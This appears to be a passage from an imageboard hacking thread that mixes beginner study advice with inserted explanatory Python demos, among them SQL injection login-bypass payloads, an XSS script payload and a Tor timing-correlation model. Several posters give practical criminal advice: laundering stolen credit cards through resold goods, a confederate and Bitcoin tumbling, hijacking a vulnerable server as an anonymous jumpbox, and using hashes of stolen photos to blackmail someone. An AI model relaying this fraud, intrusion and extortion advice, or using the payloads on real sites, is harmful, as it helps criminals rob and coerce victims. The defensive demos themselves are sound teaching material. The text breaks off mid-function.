NSA owns a lot of Tor exit nodes and NSA has connections to most international secret agencies that have local power to ask ISPs to do their bidding.
So, time correlation attacks, where packet times are looked at coming into the Tor network (by the ISP) and coming out of a Tor exit node (by NSA), could link your identity to the jumpbox.
Although this wouldn't be done on some small fishy.

I would suggest either buying a VPN or rooting some old box that you would use between your PC and the Tor network just so that your ISP doesn't see that you communicate with Tor.
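A toy model of the timing-correlation attack the post above is talking about, added here as an example (it is not from any post in this thread and not real tooling). Two constructed packet-timestamp series stand in for what an observer at the client's ISP and an observer past the exit would each see; the fixed circuit latency cancels out once you look at inter-packet gaps, and only the jitter is left to blur the match. The traffic model, latency and jitter values are assumptions chosen to keep packet order intact.

```python
import random


def inter_arrival(times):
    """Gaps between consecutive packets: the timing 'fingerprint' of a flow."""
    return [b - a for a, b in zip(times, times[1:])]


def pearson(xs, ys):
    """Plain Pearson correlation coefficient, no numpy needed."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = sum((x - mx) ** 2 for x in xs) ** 0.5
    sy = sum((y - my) ** 2 for y in ys) ** 0.5
    return cov / (sx * sy) if sx and sy else 0.0


def make_flow(rng, n, burst_p=0.4):
    """Constructed client traffic: short bursts (0.05-0.2 s) mixed with idle gaps (0.5-3 s)."""
    t, times = 0.0, []
    for _ in range(n):
        t += rng.uniform(0.05, 0.2) if rng.random() < burst_p else rng.uniform(0.5, 3.0)
        times.append(t)
    return times


def seen_at_exit(times, rng, latency=0.35, jitter=0.02):
    """The same packets observed at the far end: constant circuit latency plus per-packet
    jitter. Jitter is kept below the smallest gap so packet order is preserved (assumption)."""
    return [t + latency + rng.uniform(-jitter, jitter) for t in times]


def correlate(entry_flow, exit_flow):
    """Score how well two flows' gap patterns line up; near 1.0 means the same traffic."""
    return pearson(inter_arrival(entry_flow), inter_arrival(exit_flow))


def demo(seed=7, n=200):
    """Returns (score for the true entry/exit pair, score for an unrelated flow)."""
    rng = random.Random(seed)
    at_isp = make_flow(rng, n)           # what the client's ISP sees going into Tor
    unrelated = make_flow(rng, n)        # some other user's traffic
    at_exit = seen_at_exit(at_isp, rng)  # what an observer at the exit / jumpbox sees
    return correlate(at_isp, at_exit), correlate(unrelated, at_exit)


if __name__ == "__main__":
    matched, unmatched = demo()
    print(f"true pair: {matched:.3f}   unrelated pair: {unmatched:.3f}")
```

Nothing here touches the encryption; an observer who can see both ends only needs timing. Real Tor traffic is padded into fixed-size cells and multiplexed with other users, which lowers the score, but the principle is why an extra hop in front of Tor (the VPN or rooted box suggested above) changes where the first observation point is rather than removing it.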



sorry for the late reply,

I wouldn't see why you would need the mathematics?

Also, before you start Redwood's open course make sure you have an asm foundation. I thought I could wing it on the way there and I learned the hard way that I couldn't.



Yeah, I'm doing C and asm before starting with Redwood. He's very helpful on reddit; it shouldn't take more than a week before I'm able to keep up with the videos. He's posting an updated series right now.

The mathematics is more of a hobby than anything, really. I'm not yet sure where I can enjoy what I do AND work at home, maybe I'll go into statistics or something. I wanna have that option, but more than anything I just like mathematics.




Where can I read more about so-called "black hat" monetization techniques?

None of that "spamming malware to grannies" Indian-scammer tier bullshit. I mean the real "1337 h4x0rz".
How do the real serious crackers make their cash?

(Disclaimer, I'm not interested in committing any crimes myself just curious about the actual details of how the criminals work)



I think studying OSCP and related fields is the most effective way. You'll have to learn that stuff to defend against it.

I'm in no way qualified to answer, it's just an educated guess.




Well you're not going to be hand held in any useful capacity because it's simply the way it is. A certain gimmick, process, technique, script (SE), or anything in between that is successful in making cash will by its nature be hoarded.

The lucrative side of things comes with networking with people. For example, I know person A. A has a few XSS exploits that are persistent and affect a very high profile web site. I look and find person B. I middleman A and B so that A isn't revealed. I collect commission.

You can be A or B, or C in this situation. But most likely you'll start out as B.

Other places where money is made by "crackers" (you really need to narrowly define this) is in selling their fruits. Such as a botnet. Or sell services as a result of that botnet, such as DDoS, or breaking hashes.

CC's are often sold in dumps and can fetch a nice price (again networking will save you here). So on and so forth.



I hate to be negative but today that's one of the biggest ways to make money,

it tends to fall under three categories
some form of credit fraud - (stealing and selling NPPI)
or exploit dev / malware dev



>CC's are often sold in dumps and can fetch a nice price
Here's something I don't understand about this.

Why would a person who has a stolen CC sell it off for practically nothing?
e.g. Selling an individual card for $5 - $30, when it can potentially be used to purchase many times that amount?

Why don't these "carders" simply use the stolen cards themselves and multiply their profits?

(Forgive me if this a naive question, I'm not exactly a black hat nor do I want to be. Just looking to get a better understanding.)




That's easy. Risk mitigation. Even with a fully cloned card you open yourself up to a tremendous amount of risk by having to appear in person with the card and possibly an ID to go with that card. You might be thinking right now, "Oh why don't they just shop online?" Track dumps aren't that helpful since most major credit card processors on the SWIFT network (banking network) now use associated data to verify the purchase.

Verified by Visa is a big one. You essentially have to go through what is a secondary authorization to activate it. Which also means having to have the address that the card is associated with.

Even with a dropshipped item there's also the risk of having someone in LE catch on and wait for you at the dropship location.

So it comes down to risk. It's often easier to sell batches of these with almost no risk, behind tor and 7 proxies (so to speak) and transact solely through bitcoin.

The recipients will be putting themselves in danger every time they use the card.

The only exception to any of this that I can really see is purchasing digital goods, such as VPN subscriptions or VPSes. The legitimate problem with cash like this is the amount you eventually lose after attempting to, and possibly succeeding in, laundering the cash into a liquid currency.



I see, that makes a lot of sense.

But why not just use the stolen cards to buy the Bitcoin itself?
Surely there are some less-than-reputable dealers out there who would sell it with no questions asked?

Couldn't someone set up a "farm", so to speak, of bots that used stolen cards from dumps to purchase large amounts of Bitcoin?




Because bitcoin always keeps record of all the transactions. Anyone can follow where the cash flows from. The moment a wallet receives the illegal funds, anyone can watch who received it and how they spend it.

The best anonymizing step is to take the CCs, convert them to liquid and untraceable goods/currency, then take the anonymizing step of disconnecting the CC from the bitcoin wallet, which still involves the steps I mentioned above.

Now people do buy bitcoin with stolen CC's but they know that their wallets are known to have dirty money. And so do other people. And it might not matter after about 30 transactions have passed, the money then can really be pointed to be anyone in particular. Just which wallets had touched other 'dirty' wallets.

If I were the CC dude I would do this. Get a CC and purchase a few items off of Amazon that might have high resale value, such as an opened box of video cards, or SSDs, or anything in general. Send it to a confederate (we mafia now) a state away and have him sell them on craigslist as part of a complete build.

The confederate then pays him in cash either before, after or whenever (so long as I would receive this hypothetical cash), then uses the cash for bitcoins. Send some bitcoins to one wallet, send some to another.

Then rinse and repeat.



>Because bitcoin always keeps record of all the transactions. Anyone can follow where the cash flows from. The moment a wallet receives the illegal funds, anyone can watch who received it and how they spend it.

Why do criminals use it? Why don't they get busted, I mean, if it's ultimately traceable back to them? How do they 'clean' it?



I don't agree with this. It's easy to 'clean' bitcoins by tumbling them through darknet services and/or converting them into another cryptocurrency through an anonymous exchange. Otherwise >>220 would have too valid a point and it wouldn't be so useful for buying drugs and for ransomware.
>But why not just use the stolen cards to buy the Bitcoin itself?
Essentially everyone that's selling bitcoins is aware of scammers and so they take ID; because if they do the trade with dirty money, you run away with the bitcoins and the banks can take their funds. The sellers who don't, charge a much higher price for the bitcoins -- check out localbitcoins, it can even be like 20% premium or something -- and they'll probably tell you to get screwed if you say you can't do a cash transfer but just have some dodgy card. It's possible but it takes effort because you need to set up fake IDs, accounts, and to seek out naive sellers. In the end it can be easier and safer to sell off stolen cards, especially if they have a lot of them



Here's a list of tutorials just posted on cybrary's forums. Seems pretty good, haven't checked yet though.




The point is that the jumpbox can be identified. With a jumpbox I can actually do DNS enumeration with zone/wildcard attacks, UDP scanning and dumping fast. What I need is to make sure that the jumpbox cannot be connected to me.



Find a vuln server, get a shell, use that.



Unfortunately no. As complicated as you try to make it, every swap is recorded. And swap groupings can be, and are, a huge point of correlation. Not to mention a lot of bitcoin laundries are outright scams. When I have a chance to get on a computer, I'll source examples of how/why btc gives everyone the chance for omniscience over the chain.



Any VPN (that upholds your privacy, I suggest cryptostorm) or rooted box should do the job.



Can someone recommend a book or learning source on linux server administration?

I have a small website I want to host on an old computer but know little about good practices and general proper security.



Take a look at cybrary and read the rest of the thread. There are collections of resources that mention linux administration.



Book is The Linux and Unix System Administration Handbook. I don't know about the security portion in particular though.



Can't go wrong with O'Reilly Linux system administration




Found more neat stuff: http://opensecuritytraining.info/Training.html

God, i haven't been this excited about studying and even living in a very long time.



I want to become a cyberpunk. I always thought hackers and demosceners and crackers and stuff were cool as shit as a kid. Then there was shit like GNAA and weev and TOR, trolls and what not like Team Gamerfood.

It always seemed beyond my scope but things have changed lately. Pirating isn't as simple as media fire and megaupload anymore. Every website you sign up on, my android phone, anything google, every time I download an app it wants all my details, sites want phonecall verifications and shit. Lately I've been looking at shit and as soon as I went to google it, many of the top results were shit that was actually RELEVANT to what I was looking at. I fucking clicked a picture of some guy holding a tomoko kuroki dakimakura, I thought it was cool so I saved it and went to google one for purchase. I typed in "Tomok" and immediately "Tomoko kuroki bodypillow" popped up for the autofill.

Shit like this has been happening a lot lately, I need to get out of the matrix.



*Forgot to add that I clicked the picture on 4chan, not Google Chrome.

I've been using it a long time now because I like the interface, I'm even using it right now typing from my phone. I used to be worried a lot about cyber dystopia back in like 2011 but I got complacent and now with TPP and shit its actually happening.

I need to start learning shit



You can find everything you need in this thread. Just look around. Try to improve your (english) writing, it will make it easier for you to interact with other communities. Good luck.



Alright, I'll look around. I don't even really know what a hacker is, I always thought they were just college-educated programmers who liked to fuck around a lot. I don't know a thing about programming, but in my youth I loved trolling and visiting unsavory places like ED, textfiles/totse/zoklet etc and 4chan.

Is there a particular music that hackers listen to? I always thought they listened to this kind of stuff.



"Hackers" are just people. They listen to whatever they enjoy, each one will enjoy a different thing.




>Then there was shit like GNAA and weev and TOR, trolls and what not like Team Gamerfood.



I could have sworn that all hackers wore tiny sunglasses and trenchcoats and listened to https://www.youtube.com/watch?v=wsCGdhJ_SNo

What am I gonna do now? I already got a cool handle (Jinzo) and everything.

nao i do da hax?



>literal nazi
>pirating isn't as simple as megaupload any more
>google knows I'm a weeb

the hacking threads really bring out the kids.

look newlain, not necessarily in this order, but:

>delete all your hentai

>throw out all your weeb shit
>actually throw out everything you own except your computer and a mattress
>read all the phrack, PHC, ~el8, and anti-sec textfiles
>install a 90s linux server on actual hardware that you get from a dumpster
>write exploits for it

fucking lurk more too



Not our friend '396, but the reason is because it's not necessarily trivial to link a bitcoin wallet with a human. A bitcoin wallet is literally a node in the bitcoin p2p network. If you only connect out to Bitcoin via Tor or another proxy, that's the best means of identifying you gone, so now you have to use other mechanisms like watching the coins like a hawk.

The other thing is, it's not like the DEA has enough resources to track and arrest every online drug dealer even if they wanted to. And they don't really want to - arresting some random MDMA vendor on the internet is not going to make anyone's career, nor are 100 similar arrests. On the other hand, being on the team that brings down a cartel means you get promoted, your group gets more funding, etc.. Remember, state repression is just as gamified as anything else in this century.





>doing any of that

But why? According to the Gugel overmind all he ever really wanted was to offer his dick to Tomoko!

Fuck all that dumpster noise.

Build a autowaifu, Lain, I know you have it in you!



Not who you're replying to, but I pretty much do already only own a computer and a mattress.

In fact, I don't even own a real mattress. I sleep on a twin sized air mattress in a shithole apartment with shifty immigrants and criminals for neighbors, and my only computers are Linux on "re-appropriated" hardware.

i am supar 1337 h4x0r nao ?




>Wants to be a cyberpunk
Wants to be a genre of fiction
>How do I become 1337 Hax0rz?
>Pirating isn't simple
And you want to hack?
>Tricked by google bot net
Good luck learning to cover your tracks.

Rethink your dream lainon. Cyberpunk is a genre of literature, just ask Gibson. Everyone and their mother wants to be like Neo and hack the Matrix, but many are let down when they realize that hacking, reverse engineering, and cracking aren't like Hollywood. For one, problem-solving skills and self-education are a must. Asking how to hack is a question left for script kiddies at best. You need to have a firm education in hardware, networking, servers, cryptography, programming, and mathematics. Come back when you have some of that under your belt and can ask more useful questions. Had you asked something like this anywhere else, you would have been met with silence or laughs. If you want useful answers, ask smart questions. Here's a guide (that guide should be stickied to the top of cyb, tech, and λ):

Also scan the gentoomen library if you need a place to start:



You mean besides your naming scheme, the fact it's an incomplete section of code, the fact you're using a ctrl-a delimiter to clear the screen, the fact that inbound_action(), inbound_privmsg(), and most of the variables you're passing are undefined?

I'm not good enough at security to know what you're trying to do. Looks like you're reading a message from a server. Is this like a command and control thing?



Can someone help me with the concept of network ports? I just don't seem to be getting it right.

Let's say there is host A and servers B and C. If servers B and C send me different information, wouldn't their IP be enough for me to know who is who?

Why do I need server B to send me information through port 90 and server C to send me through port 91? I understand that ports exist to allow you to connect with different applications and services, I just don't see why. From a security perspective it makes sense, since you can block anything that isn't 90 and 91, but that's not the reason ports exist, is it? They exist to allow more communication.



>Why do i need server B to send me information through port 90 and server C to send me through port 91?
You don't? Web servers for example typically listen on port 80, and they are contacted by many different clients.



Then what do you need ports for?



So you can run an ssh server and a web server at the same time.



So it works from the server point of view?

I was thinking about it from the host POV, as in "i will be accessing this IP and expecting things from this port".

But it's the other way, "i'll be sending stuff from my IP and you can expect from this port, and if i send something else, i'll send you another port", correct?



Yeah, a client will send a return address and port with its message to the server. Have a look at the wikipedia page.
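The exchange described in the last few posts, as an added example (not code from anyone in the thread): two services listen on the same IP on different ports, a client connects to each, and both sides report the (ip, port) pairs the kernel assigned. The client never picks its own port; the kernel hands it an ephemeral one, and that pair travels in every packet so the server knows where to reply. Loopback, port 0 (let the kernel choose) and the service names are assumptions made so the script runs offline.

```python
import socket
import threading

HOST = "127.0.0.1"


def _serve_once(srv, name, seen):
    """Accept one connection, record the client's (ip, port) as the kernel reports it,
    and answer with the service name so the client can tell who it reached."""
    srv.settimeout(5)
    conn, peer = srv.accept()
    with conn:
        seen[name] = peer
        conn.sendall(name.encode())
    srv.close()


def start_service(name, seen):
    """Bind a listener on a free port (port 0 lets the kernel choose) and serve one client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    worker = threading.Thread(target=_serve_once, args=(srv, name, seen), daemon=True)
    worker.start()
    return port, worker


def talk_to(port):
    """Connect as a client; report the ephemeral (ip, port) we were given and who answered."""
    with socket.create_connection((HOST, port), timeout=5) as c:
        local = c.getsockname()    # our half of the 4-tuple, chosen by the kernel
        remote = c.getpeername()   # the service we asked for
        reply = c.recv(64).decode()
    return {"local": local, "remote": remote, "reply": reply}


def demo():
    """Run a 'web' and an 'ssh' listener side by side and talk to both from one host."""
    seen_by_servers = {}
    web_port, w1 = start_service("web", seen_by_servers)
    ssh_port, w2 = start_service("ssh", seen_by_servers)
    web = talk_to(web_port)
    ssh = talk_to(ssh_port)
    w1.join(5)
    w2.join(5)
    return {"web": web, "ssh": ssh, "seen_by_servers": seen_by_servers}


if __name__ == "__main__":
    for name, conn in demo().items():
        print(name, conn)
```

The two listeners are told apart only by destination port, since the destination IP is the same for both; each connection is then identified by the full four-tuple (client ip, client port, server ip, server port), which is also what a firewall rule like "allow 80 and 443 only" is matching on.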



Thanks a lot.



How do you fake seeders/leechers on a torrent? Do you need a botnet to do this?




>get stuck at level 11 in smashthestack
>get stuck at basic level 10 in hackthissite

Should I just learn PHP already?



Keep trying lainon!

I know you can do it :)







I succeeded! Onto realistic missions.



They shouldn't. Bitcoin is not private or untraceable. Coinjoin works i guess but that is built on top. What you want is Monero.



Most of HackThisSite can be done just by reading the forums.



it's easy

>read the bittorrent protocol specification

>probably also read some of cam DHT papers
>use the knowledge you obtain to fake seeders/leechers on a torrent



what means PHP? I want to make my own Chan but I keep seeing that word. Why do you have disdain for it?



PHP is a language. You use it to code websites that need to perform actions on the server. Like storing pictures... managing a database




PHP is a programming language that is used for websites.

HTML is markup. You can't do anything programmatically with this, but it's of course really useful to make a 'blueprint' of what you want to see.

CSS and JavaScript are there to help make the HTML actually look pretty, and create any cool effects you'd like to see on your website.

PHP is what you use when dealing with anything involving security, databases, etc. If you look at the source code of a website, you do not see the PHP, which is one reason it's so useful. The other reason it's so useful is because it's one of the few things you can use on a website to manage certain tasks that HTML just can't really do.

> Why do you have disdain for it?

There is so much hatred for php because it's just an overall awful language. It's messy, most people just throw stuff together. It's very insecure, and it's a linguistic nightmare. Go look up examples of the code, you'll understand what I mean if you've ever worked with any decent programming languages.



Oh cool, thanks. What languages should I learn in order? It sounds like you need to know a bunch to just do even simple stuff.

I think I'll start with HTML, thanks a lot.



okay so I learned some HTML now I'll soon be on my way to leetness




If you plan on any backend web usage you need to know basic PHP regardless; you're only shooting yourself in the foot by delaying the inevitable.



Or you could leave the 90s technology behind and use a modern Python or Ruby based framework.



Oh you forgot to mention node.



I didn't forget. Node is cancer.




As is python, ruby, and every other web-dev facing language (yes they can be used for other things).



I haven't studied enough to say anything about these languages, but one of the few things that all sources i'm studying from agree with is that python is a great, robust and secure language. What do you have against it?




It's not the language, it's the web-dev community, which is largely why PHP is shit: because of the shitty culture surrounding development.

I'll give you one example. Unless you specifically go out of your way to implement cooperative task programming (coroutines) with gevent, the twisted framework, or asyncio libraries, the GIL will impose an upper limit on possible connections you can handle /well/.

Now that's not a limitation of the language itself (since there are ways to accommodate it sanely), but it's definitely not something an off the shelf brogrammer will know how to deal with it. Add redis for message passing? Well how would you expect the same person to know how to allow their application to scale?

I've google dorked a shit ton of flask programmers that left the interactive prompt enabled with their apps since they didn't bother to install a proper WSGI middleware to handle it.

There's nothing particularly "safer" about the language given the ability for programmers to be lazy, or simply out of their depth. That goes for any part of web-dev regardless the language used.



If you plan on attacking a web application you need to know the basics of how the backend is built, regardless of how you feel about them. You don't need to be masters, you don't need to LIKE them, but you need to know the basics so you know how to attack them. How you would do SQL injection on a PHP application is different from Ruby on Rails etc.

It's mostly because everyone uses a framework, and frameworks / libraries are not built with security in mind. SQL should have gone the way of the dinos by now but people still use old, out-of-date libraries instead of libraries with filtering and sanitation built into the functions and classes.
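The injection the post above refers to, worked through as an added example (not the poster's code, and written against Python's bundled sqlite3 rather than PHP/MySQL so it runs anywhere). The vulnerable login pastes the username into the statement; the safe one binds it as a parameter, which is the same mechanism PHP's PDO and mysqli prepared statements give you. The users table and its two rows are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory database: the users table an app might log people in against."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "hunter2", 1), ("bob", "letmein", 0)])
    return db


def login_vulnerable(db, user, pw):
    """The classic bug: user input pasted into the statement text, so quotes and
    comment markers in the input are parsed as SQL syntax."""
    query = f"SELECT name FROM users WHERE name = '{user}' AND password = '{pw}'"
    return [row[0] for row in db.execute(query)]


def login_safe(db, user, pw):
    """Bound parameters: the driver sends the statement and the values separately,
    so the input is only ever compared as data, never parsed as SQL."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(query, (user, pw))]


def demo():
    """Run two textbook payloads against both versions and return who got logged in."""
    db = make_db()
    # Attacker knows a username but not the password: comment out the password check.
    bypass_user, bypass_pw = "alice' --", "wrong"
    # Attacker knows nothing: make the WHERE clause always true.
    tautology = "' OR '1'='1"
    return {
        "vuln_comment": login_vulnerable(db, bypass_user, bypass_pw),
        "vuln_tautology": login_vulnerable(db, tautology, tautology),
        "safe_comment": login_safe(db, bypass_user, bypass_pw),
        "safe_tautology": login_safe(db, tautology, tautology),
        "safe_real": login_safe(db, "bob", "letmein"),
    }


if __name__ == "__main__":
    for case, users in demo().items():
        print(f"{case:15} -> {users}")
```

The "filtering and sanitation" the post asks for is the wrong tool here: escaping quotes is fragile across character sets and quoting rules, whereas a bound parameter can never change the statement's structure no matter what it contains.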



I'm currently reading ARM Assembly Language by Pete Cockerell. Holy shit, it's an amazing and short book, he explains a lot of complicated concepts in a beautifully simple way.

This book is in the gentooman's torrent file. I haven't finished it, but i highly recommend it, if anyone wants to learn assembly and basic computer architecture. He goes from ground zero and explains everything to you perfectly well.

I tried to read Hacking - The art of exploitation but gave up because they heavily use assembly right at the beginning.

What are you guys studying? Do you recommend any books, courses or videos?



PHP is shit but that's a terrible reason to not learn it. This isn't web development. How many shitty apps do you think are created in PHP? What do you think Wordpress and all of its plugins are written in?



You won't fully understand Hacking: The Art of Exploitation on the first go, DON'T LET THAT STOP YOU! Most people quit after things get hard; if you don't understand something, search it on the internet, look at forums, there are a lot of good places to discuss exploitation!

This is the go-to course everyone points to, all open courseware. You need to know basic asm (x86) and C, but that shouldn't be hard if what you're saying is true.

Also cybrary.it has a lot of good stuff and open courseware, but my only gripe is that it's only really there to get people ready for certs. Not a bad thing.



on top of that the torrent for the CD vm is here http://www.mininova.org/tor/2533556



Oh don't get me wrong, I'm not quitting on the field at all! It's just that right now I'm studying from quite a few sources and I'd rather take a week or two to study ASM/C and only then go back to The Art of Exploitation.

Thanks a lot for the resource! I already tried studying from there but right at the first class he mentions a lot of assembly and C, so right now I'm just going back to study C and assembly before going into Hack All The Things and The Art of Exploitation. Otherwise I'd be stopping every ten minutes to study a related subject since I don't have any experience with C or lower level languages; I've only worked with Java in my career.

If you could recommend any material for C I'd gladly take it! Right now I'm just using Learn C the Hard Way ( http://c.learncodethehardway.org/book/ ) and a few books for assembly + tutorialspoint ( http://www.tutorialspoint.com/assembly_programming/index.htm ).
I should be done with Learn C the Hard Way and ASM this weekend, then I'll try both The Art of Exploitation and Hack All The Things. I'm also watching A+ from cybrary; I'm not taking the certs but I'm feasting on the videos, the material is pretty neat, I'm 42% through the course right now. After that I'll take other courses in networking and security.

If there's anything you can recommend me, I'd be really grateful, not only for C but anything that'd be helpful from a security perspective overall.



The book by Pete Cockerell starts showing its age after the first chapter. He uses the ARM architecture; I felt like I was missing out on studying from him if I kept on it. But I still recommend the first chapter of the book for anyone who doesn't have these concepts. He delivers them in a very elegant way.




Well, despite agreeing with you mostly, I'll say that I meant to say that even /if/ the module/framework makes great strides towards security. Django for example (which I personally dislike) has one-size-fits-all CSRF protection, XSS detection, and makes it difficult to perform SQL injection as long as you utilize the provided ORM.

But the point I was making was that even in the face of /that/, the implementors of the frameworks, towards their end product, will still largely fail by using unsafe defaults (default non-escaped template interpolation), or failing to test for edge cases that can be present in every app, as well as not understanding the implications of not providing cookies through SSL, or using other backend products that break from the security suite provided by the framework. Django for example won't apply its ORM to Redis, ZeroMQ or other pairings that aren't often seen with Django in this example.
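Two of the failure modes named in the post above, shown side by side as an added example (not Django code and not from anyone in the thread): interpolating a value into HTML without escaping, versus escaping it, and a session cookie issued with and without the Secure flag. The one-slot template, the token value and the payload are constructed for the demo; the framework-free `render_*` functions stand in for a template engine with autoescape off or on.

```python
import html
from http.cookies import SimpleCookie

PAGE = "<p>Hello, {name}!</p>"   # constructed template with one interpolation slot


def render_unsafe(template, **ctx):
    """What a template engine with autoescape off does: raw interpolation."""
    return template.format(**ctx)


def render_safe(template, **ctx):
    """Escape every value before it lands in HTML; quote=True also covers attribute contexts."""
    return template.format(**{k: html.escape(str(v), quote=True) for k, v in ctx.items()})


def session_cookie(token, over_tls=True):
    """Build a Set-Cookie value with the flags the framework leaves to you:
    HttpOnly keeps it out of document.cookie (so a stored XSS can't read it),
    Secure keeps it off plaintext HTTP, SameSite=Lax blunts CSRF riding on the cookie."""
    jar = SimpleCookie()
    jar["session"] = token
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = over_tls
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="").strip()


def demo():
    """Render a script payload both ways and issue the cookie both ways."""
    payload = "<script>alert(document.cookie)</script>"
    return {
        "unsafe": render_unsafe(PAGE, name=payload),
        "safe": render_safe(PAGE, name=payload),
        "cookie_tls": session_cookie("deadbeef"),
        "cookie_plain": session_cookie("deadbeef", over_tls=False),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:13} {v}")
```

Escaping on output (not on input) is the rule: the same string may be safe in a database and dangerous in an HTML attribute, so the escape has to match the context it is written into.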





What, you just parse input into a buffer like that?
No checks whatsoever?
Enjoy your remote code exec.



The code doesn't show the buffer being filled which is where problems like that come from (i.e. they didn't check the bounds and filled past the end of buffer). There's another bug in there but without context it's very hard to say how exploitable it is.
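The code being argued about is not on this page, so here is an added model of the bug class the replies name (Heartbleed-style: a length field in the header is trusted instead of being checked against the bytes that actually arrived). It is written in Python, which cannot read past a buffer, so the "memory" is a constructed byte string holding the record plus unrelated data; the unchecked parser slices by the declared length and pulls that data out, the checked one refuses. The 1-byte type / 2-byte length record format is an assumption, not the format from the original code.

```python
import struct

HEADER = struct.Struct("!BH")   # constructed record format: 1-byte type, 2-byte payload length


class MalformedRecord(ValueError):
    pass


def echo_unchecked(memory, received):
    """Models the C bug: the parser holds a pointer to the record inside a larger buffer
    and copies as many bytes as the header *claims*, never asking how many it *got*.
    `received` is ignored, exactly as in the vulnerable code."""
    rtype, declared = HEADER.unpack_from(memory, 0)
    return memory[HEADER.size:HEADER.size + declared]


def echo_checked(memory, received):
    """The fix: bound the declared length by the bytes actually received."""
    if received < HEADER.size:
        raise MalformedRecord("record shorter than its header")
    rtype, declared = HEADER.unpack_from(memory, 0)
    if HEADER.size + declared > received:
        raise MalformedRecord(
            f"header claims {declared} payload bytes, only {received - HEADER.size} arrived")
    return memory[HEADER.size:HEADER.size + declared]


def demo():
    """A record claiming 64 payload bytes but carrying 4, sitting in a buffer that also
    holds unrelated data (constructed stand-in for whatever else lives on the heap)."""
    record = HEADER.pack(1, 64) + b"ping"
    memory = record + b"\x00" * 8 + b"PRIVATE-KEY-MATERIAL" + b"\x00" * 40
    leaked = echo_unchecked(memory, len(record))
    try:
        echo_checked(memory, len(record))
        rejected = False
    except MalformedRecord:
        rejected = True
    honest = HEADER.pack(1, 4) + b"ping"
    return {
        "leaked": leaked,
        "rejected": rejected,
        "honest": echo_checked(honest, len(honest)),
    }


if __name__ == "__main__":
    r = demo()
    print("unchecked reply:", r["leaked"])
    print("checked rejected bogus length:", r["rejected"])
```

In C the unchecked version is a read past the end of the received record (an over-read); if the same trusted length feeds a memcpy into a fixed-size destination it becomes the write overflow the earlier reply jokes about. Either way the check is the same: declared length against bytes present, before any copy.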



This guy gets it. Seems like nobody itt but you can actually hack. And correct, the exploitability isn't sure, but the idea is the same as in Heartbleed.



Are there any good hacker groups out there?
Hackers as in "We spend most of our days studying because we enjoy it" and not "let's go deface a website because it's easy".

Not that i have any qualification for joining, but it'd be good to know that such communities exist online.



>"We spend most of our days studying because we enjoy it"
>"let's go deface a website because it's easy".
It's essentially the same thing. You get real world hacking experience by hacking into real world systems. Jacking off to kevin mitnick and his jewish books won't make you a leet hexer.



If it's easy you're not gaining any knowledge or insight. It's pointless.



Repetitio mater studiorum est



I don't really agree with you that hacking is even about that, but again i might not have as much experience as you do.



>gaining any knowledge or insight. It's pointless.

I'm assuming you don't know what XSS is... Being able to see the various XSS vulnerabilities in websites makes you more able to securely build website code.

As well, it's more fun and intuitive than reading a book. That's probably why he wrote that it's 'easy'

He didn't mean easy he meant fun.



What is hacking about then? Is it about hacking into systems or something else? Curious desu senpai



Changing the intended purpose of a thing (usually software), making things more efficient than people thought they could be, finding vulnerabilities that have not yet been found, making things that shouldn't work, work.



Well yeah, that's the neckbeard definition that GNU enforces... mostly so they could refer to each other as hackers without being grouped in with computer criminals.

The hacking thread you are in now (and hacking as an international scene) are about breaking computer security, it could be via 0days or conventional, well researched ways. It can be about real life systems and networks or CTFs and simulated ones, but the idea is the same.

>finding vulnerabilities that have not yet been found

is hacking, but hacking is not just
>finding vulnerabilities that have not yet been found

'hacking' is the general idea of getting into digital places you aren't supposed to get into.



I see. Either way, there is a clear distinction between groups that only deface a system and groups who are able to get inside a system.

Here in Brazil, for example, there are tons of "hackers" that couldn't create a fizzbuzz if you asked them. They just watch a youtube video about how to deface a wordpress page and then do it and call themselves "anonymous".
That is the distinction i wanted to make between defacers and hackers.




There are good groups from BR too. I remember SL & EllyEl8 (xero pretending to be little girl or some gay shit like that) hacking into Hann's box a couple of times. It was pretty bueno ownage.

Pic related kek



>Seems like nobody itt but you can actually hack.
Nah. I figure the people who are sure they know the answer do what I did when I first saw it and not say anything because they don't want to ruin it for others.






Snowden just tweeted a huge hex string, anyone know what's up?




broken link, anon




He deleted it. Here's a print.



alright, i'll risk the ridicule.

what's the point of publicly posting hashes like this? to encrypt proof of something and post it later? obfuscated communication?



I've no idea.



Known plaintext vulns are old as fuck in the area of crypto. Nothing to see here, people.




To claim authorship of an upcoming leak. Or to demonstrate that you're in possession of something for leverage.

I.e.: You steal a notable hacker's photo library and your aim is to blackmail them. You publish the hashes of all the pictures in that library. The hacker will then realize (either through an auxiliary channel or through the same blind post method) that his identity is compromised.

Then you are free to make your demands or make the point known that you have leverage over that individual.

Also, hashes are used often in hashed based content addressing systems like ipfs/dht. So he might be publishing a file that exists on one of those file distribution methods. Or it could be a key hash.

One can also pick which protocol (M.O. specific to opsec or OTP list by selecting the list by nickname + salt). And the salt can be agreed to change with time and our sequence.
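The "publish the hash now, reveal later" use described above is a hash commitment; here it is as an added example (not code from anyone in the thread), together with the content-address reading of a bare hash. The nonce matters: a bare hash of a short or guessable message can be confirmed by anyone willing to try candidates, whereas a 32-byte random nonce prefixed to the message makes the published digest reveal nothing until the reveal. The message strings are constructed for the demo.

```python
import hashlib
import hmac
import secrets


def commit(message, nonce=None):
    """Publish only the digest now; keep nonce and message private until the reveal.
    A fresh random nonce (assumed 32 bytes) stops anyone confirming a guess about the message."""
    if nonce is None:
        nonce = secrets.token_bytes(32)
    digest = hashlib.sha256(nonce + message).hexdigest()
    return digest, nonce


def reveal_ok(published_digest, nonce, message):
    """Anyone holding the earlier post can check the reveal. Constant-time compare out of habit;
    the digest is public here, so it is not strictly needed."""
    expected = hashlib.sha256(nonce + message).hexdigest()
    return hmac.compare_digest(expected, published_digest)


def content_id(data):
    """The other reading of a bare hash: a content address, valid for exactly one byte sequence.
    No nonce, so it is only as private as the data is unguessable."""
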